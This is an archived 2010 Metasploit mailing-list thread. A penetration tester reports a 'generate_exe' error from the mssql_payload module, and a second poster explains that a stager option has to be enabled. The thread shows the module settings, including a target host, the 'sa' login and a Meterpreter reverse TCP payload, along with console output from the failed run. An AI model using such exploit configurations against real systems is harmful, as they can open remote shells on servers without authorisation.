Metasploit mailing list archives

Re: generate_exe error on mssql_payload


From: Robin Wood <robin () digininja org>
Date: Tue, 21 Dec 2010 14:09:00 +0000

On 21 December 2010 14:03, Rob Fuller <mubix () room362 com> wrote:
I believe you have to have at least one of the options on:
UseCmdStager, UsePowerShell, UseWinDebug

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org

OK, fair enough. Could do with a better error message though if anyone
a spare few mins.

Robin

(Back to hammering my limited SQL access)




On Tue, Dec 21, 2010 at 6:24 AM, Robin Wood <robin () digininja org> wrote:
Trying to run mssql_payload with the following options but got the
error at the end. It works (well runs, no shells yet) with the other
options.

Robin

Module options:

  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  PASSWORD                        no        The password for the
specified username
  RHOST          1.2.3.4       yes       The target address
  RPORT          1234             yes       The target port
  USERNAME       sa               no        The username to authenticate as
  UseCmdStager   false            no        Wait for user input
before returning from exploit
  UsePowerShell  false            no        Use PowerShell for the
payload conversion on Server 2008 and Windows 7
  UseWinDebug    false            no        Use Windows debug for
payload conversion, 2k3 and below only
  VERBOSE        true             no        Enable verbose output


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread,
none, process
  LHOST     1.2.3.3      yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 1.2.3.3:4444
[-] Exploit exception: undefined local variable or method
`generate_exe' for #<#<Module:0x105bd5410>::Metasploit3:0x109eff628>
[*] Exploit completed, but no session was created.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: